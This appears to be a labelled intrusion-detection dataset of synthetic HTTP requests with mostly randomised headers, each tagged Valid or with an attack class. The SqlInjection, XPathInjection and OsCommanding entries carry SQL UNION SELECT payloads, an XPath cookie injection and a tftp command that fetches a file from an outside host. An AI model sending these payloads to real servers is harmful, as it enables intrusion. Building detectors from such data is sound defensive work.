If-Match: "bJvohY-CQgno3sirzM"
If-None-Match: "MnOV8FmO.zAsM@Qe"
If-Range: "bBMmfvHNkTF317_6."
Max-Forwards: 0
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: npwt Loartcsg=sdhi
Authorization: NTLM NnMwdXRlcGFmamJkRmRnZWhydWhwdW9kVWRjc2ZzZ2Rrb3R0ZQ==
Range: 7-,1-2,575-73
Referer: http://www.iretmLla.org/6tvr/rnsmn4/smBr/tsk5l/lysttmBc.gif
TE: deflate,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.1 (compatible; Konqueror/1.3; Unix; sia4n6c8S; ezei3ueb; aEthncnceo)
UA-CPU: 68000
UA-Disp: 0205,052,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 470x7016
Via: 6.7 www.0fheNi.png, 4.7 www.Hctaasot.htm
Transfer-Encoding: compress
Upgrade: dZEi/8.5
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 156.117.248.41
X-Serial-Number: 21316010619533
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10021
Start - Id: 35132
class: SqlInjection
POST /e8/hD6u0yJ.iR20EV/at5niijZr2/iN@MooiKpcNk4r__Q/sISh4UkEBYO/okXcTY/sbFUCUHzAK8-q/mbKhYnIf5YuEApJ8/huwNrC-/es.sh? HTTP/1.1
Content-Length: 77
Content-Language: w,eseem,hVvpej
Content-Encoding: deflate
Content-Location: http://www.eo1rad.cz/di7b4eg/cdcnzvew/0rayyo.mp3
Content-MD5: NXNEMXdudDA1dXVpOWU5ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Aug 08 22:27:38 CET
Last-Modified: Sat, 19 Jun 04 17:27:38 UTC
Host: 178.216.233.125:57834
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: e6oss='e'
Client-ip: 119.220.168.61
Cookie: 4nab6ezjei=rfa
Cookie2: $Version="43"
Date: Sun, 12 Mar 06 03:45:03 GMT
ETag: "wECWPXUQhi-PB9N"
Expect: 100-continue
If-Modified-Since: Tue, 02 Oct 07 23:47:18 GMT
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: "TRPBEfuXE5aCke9d"
If-None-Match: "TgYUygSVUAV0SzAChIny"
If-Range: Sun, 02 Aug 09 23:58:45 UTC
Max-Forwards: 32
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: 03hTlE Tqem=cllmecx
Authorization: NTLM RWVndG50NnppWWNzYW16aGNvYWhuc25vdDlZb2Fyb3lhMnlzeHlyaA==
Range: 9644-,893-04607,798896-
Referer: /ptsd.sh
TE: trailers,chunked;q=0.4
User-Agent: Egeru53hnI/5.6.7.0
UA-Disp: 124,974,8
UA-OS: Windows NT
UA-Color: color8
Via: 4.3 158.99.178.146, 4.3 57.150.156.12, AIm/5.9 www.arei.shtml
Transfer-Encoding: rdtn
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zmyaegk='   union   select   @@version,1,1,1--&rnaetaeeo=g9ePntud

End - Id: 35132
Start - Id: 10348
class: Valid
GET /lwPyEf/tlL9CL3S7ezBeXTXJ/auotishhuhas/oPo5-DkLc57JF/bFe/oo6pltntxxofoitlw/ejaa8tuceuoh19/eb/t9Jgsv-Oy6tWq/i7oJIfx8yozRq2xM/ZN/hlnar3.jpeg?zXB1KcuInlsEr=yiegrohO&v@ERJ=eyY&eetlutayctOyok=129647&oum2l=sock_streamrtmpf&Snrtoonu=Uattc%2Biobody&Daccess_logWSnWdZJexecd=9230&ac=svocwVV5&tahEsjpaaaP=echocf&nH=a335tz4%40O&Flink8.swtwmV=ANee&snrwhut=sSnfgnarjy&ennh=4 HTTP/1.1
Host: 74.237.48.79
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.8, compress, gzip
Accept-Language: t-aiceirhn;q=0.9, ei-a;q=0.6, Ynaiai-tjfe7;q=0.1, on-ac, hQaofsl-ec4hcu;q=0.2
Cache-Control: no-transform
Client-ip: 184.240.10.145
Cookie: sts5ncrieeIb=a9vnr vd@
Cookie2: $Version="53"
Date: Sun, 17 Jan 10 19:47:59 CET
ETag: W/"L-asoLJ_w3zcW2hC_PGB"
Expect: 100-continue
From: foniz@txtCtS.de
If-Modified-Since: Fri, 20 Nov 09 10:39:17 CET
If-Unmodified-Since: Tue, 30 Jan 07 07:55:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7981
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM cnRjVEFycjZ0bmNucmxObmhhRUlsaW5idWFJdGl6ZWhuYmU5
Authorization: Digest nonce
Range: -904
Referer: http://weNhnsfe.cz/mawze/ototxoee/rse7umi/iftxrl.asp
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/1.6 (compatible; 2ntpOyE1m; Win 9x; nvodeoec; vrAaeIio1)
UA-CPU: PowerPC
UA-Disp: 6878,6182,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: 1.3 146.185.191.84:32, 8.2 www.aoz9ybtp.html
Transfer-Encoding: gzip
Upgrade: net/2.1
Warning: 789 148.216.97.93 "he2Hr6c" "Thu, 03 Aug 06 14:02:34 CET"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10348
Start - Id: 9806
class: Valid
GET /8jelobIwbtjorb/iYO6ExH-2viwNBx.Am9L/f3vbMVc3.asmx?48sMavas4ex=a&QefpFY2=413762&7s8h=532041&ssEtdvieRp=+NulOnsptx&esr=temuab&mg0rt=lr%40ioituehnxp_0e HTTP/1.0
Host: 40.203.99.250
Connection: hlp8
Accept: text/xml;q=0.9, text/html
Accept-Charset: cp-936, macintosh
Accept-Encoding: compress, compress
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 142.252.165.176
Cookie: bWiylocation1w=3;UuAWyni2o=3mAkn;eaa=i62pdeEcA;aOztt=1519
Cookie2: $Version="17"
Date: Sun, 05 Sep 04 13:52:19 GMT
ETag: W/"rvGXJuKjElArHqEm7Xe9"
Expect: 100-continue
From: 9rLl@rrheE.org
If-Modified-Since: Thu, 03 Jan 08 05:54:25 GMT
If-Unmodified-Since: Thu, 06 Jul 06 17:05:24 CET
If-Match: "MFnHqFCSpxfFI4cD@3"
If-None-Match: *
If-Range: Sun, 13 May 07 01:37:01 UTC
Max-Forwards: 02
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest qop=dARhoRu
Authorization: Basic MjMxdXM6cm8xcmdl
Range: -988,03-4,64-3
Referer: /nnut2P/oienA/juAem/5topXeoe.bin
TE: trailers,deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: oathmtgrntiqWrrt4Za
UA-CPU: PowerPC
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3832x6503
Via: eeof/1.9 54.4.37.89, FTP/3.5 150.248.16.98, HTTP/4.0 209.2.62.51
Transfer-Encoding: identity
Upgrade: jaeNfe/6.3, eitr/9.7, Eia/7.9, ryge/4.3
Warning: 698 www.henrsinf.js "setsncEu3mh2ihzrest" "Sun, 01 Oct 06 12:14:24 UTC"
X-Forwarded-For: 239.251.116.128
X-Serial-Number: 3012101828224515543
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9806
Start - Id: 43212
class: OsCommanding
GET /eV4-AwsKcgpciWfgIl/vIyi%uwp-P/oG5c/nvjhdEgY/qR5cfS5/pshL4e4rngyNdEh/neeniarwntT/ex9lutiayv/fkOtd0bwObzxgfUS.mdb?JkvarCZ68XB=wpuoYhddtegah&wirsscthiiej=6etc&_Y1T5=tsocseSlhnf&hncdit3raRotm=oYH0XN&nnlh89ra=hpSyioimVe6anqser&oloYs9t4plpeywm=%27%3B+++++tftp++-c+++++get+++www.elalgeorra.com%3A%2Fannaliti.tar&TmXteuLon1=6IDP&.AWadmin=372752&e1ontndectg=1&jCBYwhaving=%5DsssbANw HTTP/1.0
Host: 58.201.13.56
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-2;q=0.5
Accept-Encoding: identity;q=0.2
Accept-Language: *;q=0.5
Cache-Control: max-stale=1931
Client-ip: 59.228.253.1
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="350"
Date: Thu, 10 Aug 06 14:09:30 CET
ETag: W/"oGyzD5bjuhHnWjG"
Expect: 100-continue
From: dce3hsp@34tobzetrq.fr
If-Modified-Since: Sat, 11 Mar 06 07:09:55 UTC
If-Unmodified-Since: Sat, 09 Jul 05 12:08:03 GMT
If-Match: "_Izm4xKtl.Xnnh24E5mY"
If-None-Match: *
If-Range: Wed, 18 Jan 06 20:47:38 CET
Max-Forwards: 064
MIME-Version: 7.7
Pragma: ta=bd
Proxy-Authorization: mfey smnSW=fltvk
Authorization: Digest nonce
Range: 2403-,12114-9,53-40810
Referer: /rP8eotu/Ono6/egbis.tiff
TE: deflate;q=0.9,gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 4.1; cn-ta; rv:4.2.4) Gecko/85374718
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 953x846
Via: FTP/2.5 101.172.107.225, HTTP/2.0 www.aet0wiat.html
Transfer-Encoding: lauvse; eychmig=l1athgp
Upgrade: cieon/9.6, fEu/4.3, uUa/0.7, eme/1.4, aopoq/1.0
Warning: 931 29.33.161.132:937 "tiriHq" "Sun, 23 Apr 06 11:58:11 UTC"
X-Forwarded-For: 36.57.46.253
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43212
Start - Id: 25645
class: Valid
GET /cfp59ruleco/mlesjEeah81/aC8Qk/tesftquu44/ytytpfyemVual/nm5Md5Le_a-8Mdz0dct.bin?is=rnNC%40nBuJ&olnaiOrbesd=liboeleaservicesRdce&e8VHrdtshhu=lJBtbrvaKm-&6rnltit=rh&ees25=n9Wrut%3E3oesp&eeeasorocs=506&08e=cbektrwnhaup&tdi7ara=6&kx7ysa=pactAnhys41 HTTP/1.1
Host: 131.57.247.14
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: eee='urih3dn'
Client-ip: 94.156.110.119
Cookie: ntrb=htirdznhiuryBdusi;iitjrz=atonzn6lniea7doi;eriiesct8=n4I;4r=64;aoinyAedojCwf=660328
Cookie2: $Version="0"
Date: Mon, 09 Jan 06 02:23:36 UTC
ETag: W/"Pvznz3VMn0cRM@Qwg"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Thu, 07 Apr 05 21:23:07 UTC
If-Unmodified-Since: Thu, 07 Aug 08 06:13:19 UTC
If-Match: *
If-None-Match: *
If-Range: "pqf6lg5xexK3TazM394"
Max-Forwards: 752
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: eqXtm hdManis=joe6ioe
Range: -8653,3111-
Referer: /iasarytj/rmEuo/nb4ahl.ace
TE: deflate,deflate
Trailer: Pragma
User-Agent: Mozilla/6.1 (X11; U; Unix 1.5; ia-hv; rv:0.8.6) Gecko/21541107
UA-CPU: 68000
UA-Disp: 841,3299,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: Opt/7.1 226.114.86.184:2078
Transfer-Encoding: compress
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25645
Start - Id: 42105
class: SqlInjection
GET /u.jAAcgY30/BsystemhttpascripteexecMk3/hxwReNs1yxT8P.cfm?6mochapCx-HiQA@=o&air2si=%27++++%29++++UNION++ALL+++++SELECT++++7191%2C1162%2C49%2C2697%2C6+++++FROM+et++++WHERE+++++%28+%27%27+++%3D++%27&dte3EF=4&nltrnuyiWr1gm=tnph-t HTTP/1.0
Host: www.si9kSAh.de
Connection: r3resig
Accept: application/*, audio/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.8, compress;q=0.2, gzip;q=0.3, compress, identity
Accept-Language: *;q=0.4
Cache-Control: usmnerpn=etsc
Client-ip: 139.71.160.209
Cookie: ddoj6oeenaop=oECrbW;childEN0ilEer=cEVkbz;aybech=< a~;pioit0npamkmiv=shott log
Cookie2: $Version="918"
Date: Tue, 10 Aug 04 10:21:54 CET
ETag: "Q0zk70e1hLyW5.yL3dW"
Expect: elzgh
From: LzmxnseS@evezd.fr
If-Modified-Since: Fri, 26 Sep 08 04:22:33 GMT
If-Unmodified-Since: Mon, 19 Feb 07 05:43:37 GMT
If-Match: *
If-None-Match: "U16Lr9tn@4cenoAUWfeh"
If-Range: *
Max-Forwards: 4591
MIME-Version: 0.9
Pragma: lof=Tc2usg
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: oecde gcei=6bae
Range: 929-145,5-,7164-5835
Referer: http://cttSr4.ch/aiQtwnmo.jpeg
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 5.0; oe-te; rv:7.6.3) Gecko/64566737
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 830x020
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 291 136.225.173.99 "ihnTeaIeqrrr4vsorh" 
X-Forwarded-For: 67.134.243.28
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42105
Start - Id: 23848
class: Valid
GET /afhtdee.pl? HTTP/1.1
Host: www.e7temg.it
Connection: t7tLante
Accept: image/gif, application/postscript;q=0.9
Accept-Charset: cp-936
Accept-Encoding: *
Accept-Language: grjnied-ce;q=0.8, r-i4e40oct, r8k-zarhN7;q=0.9
Cache-Control: min-fresh=227
Client-ip: 158.198.144.188
Cookie: mosmiw=+5ii;dirbdrisskaw=]Ioe;snep=0709867;neoyIa=l 7Ne-su;aole4=[h
Cookie2: $Version="77"
Date: Thu, 30 Oct 08 24:08:09 CET
ETag: "TuRdTw-hBPfWNyzx"
Expect: 100-continue
From: iaaodun@atohoee.uk
If-Modified-Since: Fri, 02 Sep 05 18:54:59 CET
If-Unmodified-Since: Sat, 10 Feb 07 05:53:55 GMT
If-Match: *
If-None-Match: "VAit6yHuCEyA-iU"
If-Range: Wed, 01 Feb 06 03:00:49 CET
Max-Forwards: 5
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="Tany"
Authorization: Digest cnonce="w4n7b"
Range: 94314-74802,587863-,08-
Referer: /zoituegf.avi
TE: trailers,deflate,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: ehttaoay (eFd2Sb; wWhMkFH; vxbu_G; yGXPaqK6e)
UA-CPU: PowerPC
UA-Disp: 5960,788,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1738x3451
Via: HTTP/0.0 33.93.42.161, HTTP/5.0 123.230.103.116, FTP/5.9 181.134.201.222:4
Transfer-Encoding: euat
Upgrade: tmu3/0.7
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23848
Start - Id: 17753
class: Valid
GET /op2Mo/suei3tTw/zihvdeglnlSilid9sc/wnerjagcmheEc/nug79zTmkuGA/s4ZGJpk/uuoBameod1tehe/snr1hvtnt9erfBtdr/scfmdCotunh/tDlSgG56Orlj/u@ePN88wMM6k2/etsdWugmasrNIal.shtml?V2R.=80490593&soIfret5ygjI=ocOi&mida2=127634&JgLWo_.=tootnd&samSCI=aiframeataoluty&9r7oes=53230132&kmt=dd&atti01urveI=ee HTTP/1.1
Host: www.ssnnSe.org
Connection: keep-alive
Accept: text/*, video/*
Accept-Charset: iso-8859-7;q=0.3, iso-8859-6, windows-1258, gb2312;q=0.4
Accept-Encoding: *
Accept-Language: sl-lai
Cache-Control: no-store
Client-ip: 28.227.18.202
Cookie: SuNHL-UwpOFo=nustjolidimt;Eed7alpfi4=Cp<b6;hp6slozEtfcay=0between;4yxoge=tdMPDC-F
Cookie2: $Version="4"
Date: Fri, 27 Jul 07 10:48:09 UTC
ETag: W/"aXgs.3_dc.q-b_zfTHm"
Expect: 100-continue
From: ueahtww@en4avehwhv.st
If-Modified-Since: Fri, 09 Feb 07 12:30:25 UTC
If-Unmodified-Since: Mon, 11 Apr 05 18:13:29 CET
If-Match: "kyRDF_cAYhaZkPs31gsd"
If-None-Match: *
If-Range: "Tpbg33Tri1K1hwoPd"
Max-Forwards: 5
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bGlucnM6aHNzaG5h
Range: -60586,8-
Referer: /h5ntt/sn3a/iSn2ow/dvpena/hlsmna9i.msf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: oVQsO7 http://www.mieue.ch
UA-CPU: x86
UA-Disp: 192,3054,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 582x198
Via: 4.1 www.1tOate.shtml
Transfer-Encoding: identity
Upgrade: ZHn/3.1
Warning: 308 174.197.96.195 "o8moaztoitdwo" 
X-Forwarded-For: 116.128.62.255
X-Serial-Number: 197606037
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 17753
Start - Id: 10166
class: Valid
GET /wNW-ydm0Dll2w9qA9S/OcDhtdem/nrKp8/cz-2@gZVKpe/sFfg22AZ/CB8ztscript4FH/tB.AOMz_7/mTeIU0@BAcWb/rdTvsIbin2D5G0z.htm?linkMJ.z=spo7mi0ov-&sd3yjy=eautlcrelfsLtcn&GqpL4Up=040286&eaxYSierrl4zahq=ousTotasaCl&RERcEgcnt9Ri=el0d%25u8tcxre7ztelnet&AhusrYadminYmD=64367&xitozri8=i07aetfe%24&8Z.8X-EGPBq=%29h&WI_xmlhtpass5FviqlW=21&dateeveeemteQ7i=0435&dartch=iyl+&zehlht=jhbrib%26%3BeNd%24Lrcpbetweenrat%3Ef HTTP/1.1
Host: www.zsDc.it:27608
Connection: 8Aulyer
Accept: video/*;q=0.3, image/jpeg
Accept-Charset: *
Accept-Encoding: identity;q=0.3, deflate;q=0.5, deflate;q=0.1, deflate;q=0.5
Accept-Language: hlam-ebr6tu;q=0.8, 3-uhci3haS;q=0.3, wFgoc8a-tmm;q=0.1, tV-7fvq
Cache-Control: e='tminhwQa'
Client-ip: 206.184.127.225
Cookie: PToHKAZ7OyND=097003
Cookie2: $Version="0"
Date: Sat, 15 Sep 07 07:18:10 CET
ETag: W/"3t_JoJnyS4lk6cjv"
Expect: cr3atea
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Sun, 06 Aug 06 12:29:29 CET
If-Unmodified-Since: Sat, 30 Jul 05 04:02:18 GMT
If-Match: "Ab8YD-nz9OnWeh3Bx"
If-None-Match: "4ppMGY3ZDj7vZd5N@j"
If-Range: Tue, 29 Jan 08 18:02:44 CET
Max-Forwards: 2
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM b3R0bnJtdFQzdHBseXNzaTNmYzVvaXl0ZXJ1b2VhY2ZvOQ==
Authorization: NTLM ZWR1dG5pdHRUc29kYmVzZWJ1Z3lha3FzYXFub2dBYXVlN2l3dg==
Range: 35-
Referer: /xanedrT/sgesik/Atimq/M6rrna/diaoc.nsf
TE: chunked;q=0.4,chunked;q=0.2,trailers
Trailer: TE
User-Agent: Mozilla/9.9 (X11; U; Open BSD i586 7.0; zm-oo; rv:1.5.2) Gecko/21054865
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: HTTP/7.7 www.2e8I03.html
Transfer-Encoding: 4rrmah
Upgrade: imhr/0.1, n6leen/2.1, iPhT/4.2
Warning: 109 252.20.208.165 "rNuyl" "Mon, 17 Jul 06 17:30:19 GMT"
X-Forwarded-For: 7.157.226.155
X-Serial-Number: 87261
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10166
Start - Id: 48492
class: XPathInjection
GET /nWuup/-HtbodyLTTEoptVL8h4/avY7Sups632YW.nsf?thirtp6dSIrtd=776&cheNo=1992900&idvten2eantoSbe=trioU&ihehkoaoN5N5at=7722&dbdeng=oEnph-%29i&5xQNEX=eizmN1&hxc4iesinryesAc=%24+&iuseoSiet=eenthsjndaesije&Riaaie=ehh9&cxJZQL_LmAx=LnnontOl&6zfu=fGrhR2&ids0i=kuTq&W82BEwhereAidinsert=00603 HTTP/1.1
Host: 181.235.208.51:13465
Connection: olsI
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Cache-Control: no-transform
Client-ip: 71.224.161.153
Cookie: nho=lt'     or path/child::node()[position()=N]    or 'ght'  =';gal=17607003;ut=zAUsReboeeidu
Date: Thu, 19 Feb 04 19:58:58 CET
If-Modified-Since: Fri, 20 Nov 09 06:15:21 GMT
If-None-Match: "l47otLZ6QrkQXxdTM-u"
Authorization: Basic ZGl3ZnBzOmFTcnkzaXZu
Referer: http://www.eTaeootc.de/wGnws/sa0fK50o/tsue1bsg/deaium.js
User-Agent: adodTboda (sQame0; rSfv9Xs; 3cGXpzvo7)
UA-CPU: StrongARM
Transfer-Encoding: compress
Warning: 190 www.teom1E.htm "nhrviblqelqrAs7stsr" "Sun, 19 Aug 07 09:38:18 CET"

null

End - Id: 48492
Start - Id: 34723
class: Valid
PUT /6i8xiattlnr5sete/khetei/eZvTe/eqeot/hus.fSS5Rizr.sh? HTTP/1.0
Content-Length: 126
Content-Language: t
Content-Encoding: compress
Content-Location: http://ue7jan.it/tdUrrkr/fasri9.pl
Content-MD5: aHQ4aGVzbGRlZWlkZWVvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Nov 04 24:27:19 GMT
Last-Modified: Thu, 30 Dec 04 15:02:51 UTC
Host: www.to6nlysa4f.st
Connection: close
Accept: text/*, video/mpeg, application/*;q=0.6
Accept-Charset: x-mac-turkish;q=0.4
Accept-Encoding: compress;q=0.3, compress, identity
Accept-Language: bola-nnhs7q3h;q=0.4
Cache-Control: max-age=52666
Client-ip: 51.127.174.180
Cookie: 9e7elem64ix1r9t= 7ln zooejc;dd=rh=p[Qesrer;ut8ayHwnF7eor=e);osP=konquRz
Cookie2: $Version="53"
Date: Sun, 24 Sep 06 16:43:04 GMT
ETag: "ghddgygvcZw2JBfz"
Expect: 100-continue
From: tta1oTo@Tdedrs.biz
If-Modified-Since: Fri, 27 Apr 07 18:54:23 CET
If-Unmodified-Since: Sat, 19 Jun 04 12:57:24 UTC
If-Match: *
If-None-Match: "fvrM_rD-k8CcP7b1Z"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.6
Pragma: d='esh0is'
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: y3qyv pomge=ncjela
Range: 27601-82680,576792-311040,-975285
Referer: http://www.cAdeacq.it/e9Cs/tfmcaOm/sv9l/Soeepso/5ihmoet.pdf
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: t3aoao8t/5.2.8.9
UA-CPU: x86
UA-Disp: 497,2476,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 420x8395
Via: 3.2 www.8wuny.jpg
Transfer-Encoding: shyeea; vbtg=jodphNyr
Upgrade: btCas3/7.1
Warning: 554 26.203.134.107 "jll9ie0otri3egtce" 
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 17723579277611262634
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8uw-lGmytLqg=eD8tkSeccmd&qZdstx=566421&evbeaclienzmgww=nofmh(tsock_stream\uwu&auksnwz=autoexecji2u&Gte3r=khneitvedohasuehs

End - Id: 34723
Start - Id: 65
class: Valid
GET /eqhlsne/nrAs9onnDoreurith/qK5fT4p4JNLAOcRtb3mw/8H.vnvbscriptdd.6/olryt3oixeorog4cn/5dCutmrva9rul/la_6duLPN55/lPYCFGIlIk9lK1IuZKG.asmx?saet3ua7=zMPlYV8t30ND&rsEi3t=betb&shie=83539640&esErmdot=14845&po3l=cot&ath8Tim=06023&_2YK@Va=402785&pub3tf=ocssrosS0d6HrmaWo&nulltfRAWU_F=45&te8la=Lexecmyetn%28hmtg&gFECDCEg_vo=hwoxbwatTs&6igaJibeana=5884 HTTP/1.0
Host: 103.180.126.197:52
Connection: keep-alive
Accept: image/*;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ss-tom;q=0.2, rIlsGfw-esa;q=0.0, fepmfy-snau, e-abearl;q=0.2, H34ca-1s;q=0.5
Cache-Control: no-transform
Client-ip: 183.254.242.68
Cookie: 2HO5h-35=e2thbAls1erxh;si6ertnnhr=eq1ZJ;EtcSjP=7077
Cookie2: $Version="646"
Date: Fri, 14 Jan 05 07:12:29 CET
ETag: "ypQlb@I913j7tUs"
Expect: Iucs9=hes5t3;voi7z=tnno
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Mon, 13 Dec 04 13:36:50 UTC
If-Unmodified-Since: Thu, 29 Jun 06 22:10:44 CET
If-Match: "MiNM9izRj4quLu2Hmv"
If-None-Match: "h5c1DOx9uUzbqU0SIp3"
If-Range: Fri, 16 Jul 04 23:56:58 CET
Max-Forwards: 138
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: ti7Ecs nlebAa=snicnldo
Authorization: Digest response="EE909DfEf6DDeE07B1384C4b511b03A0"
Range: 1364-
Referer: /Rlxaadi/netct.swf
TE: deflate;q=0.3,trailers,deflate;q=0.1
Trailer: Date
User-Agent: aQM2Ci2ua http://www.e4ne.fr
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 415x959
Via: FTP/4.0 101.119.131.179, 4.3 26.214.122.17, sed/5.8 www.aeniurEH.js:248
Transfer-Encoding: gzip
Upgrade: 8wp/1.6, oh2/7.9, litly/2.3
Warning: 677 www.q9wlho.js "egacce" "Thu, 06 Oct 05 22:42:10 GMT"
X-Forwarded-For: 88.93.220.175
X-Serial-Number: 953974207660518
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 65
Start - Id: 23124
class: Valid
GET /7adecdIcRo/Ra.e/0a5aOteeTmeuy/mparnolt/q0XTWP/knrsLstoolast99Thcod/epn/brifeetmkobtok9mc/h_bR/3y3lrb4y/7andNz6fQ7/MQJklvamKhtacces.exe?5iwI9mwo=eaRMt%7Creidg&epTpkietei=r+slv&eans=s%29ildsCcVqed4 HTTP/1.0
Host: www.etus.cz:01141
Connection: twtilGdb
Accept: */*
Accept-Charset: euc-jp;q=0.0, euc-tw;q=0.8
Accept-Encoding: 
Accept-Language: eq-I1, s-eeeO;q=0.9
Cache-Control: 4tfhno='dizoK'
Client-ip: 111.184.188.213
Cookie: e3fglocationBdL9Q=-bO1eeaccess_logae2wuHts;b1sisRu=l%vol;deleteStmp4VSoE=87791
Cookie2: $Version="20"
Date: Thu, 04 May 06 02:41:41 CET
ETag: "3.I9kRFBydMo6wPbyXB"
Expect: 100-continue
From: Hocan@osthutarg1.biz
If-Modified-Since: Sun, 20 Dec 09 21:24:45 CET
If-Unmodified-Since: Wed, 16 Jul 08 04:43:38 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 23 Apr 07 11:18:20 CET
Max-Forwards: 8
MIME-Version: 8.3
Pragma: enht=8fu
Proxy-Authorization: sreaa nzhdndbb=rDnD
Authorization: Digest realm
Range: -515103
Referer: http://3nrnqoah.de/tvW4/Riqsah8/shoTbu/cnrA/hfltsrm.jsp
TE: trailers,trailers
Trailer: Referer
User-Agent: On3a9Ae/8.8
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: 5.0 107.111.147.105:344
Transfer-Encoding: t5e7
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 409 108.29.177.127:64647 "raeoofrtmfesue" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 026545042
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23124
Start - Id: 22740
class: Valid
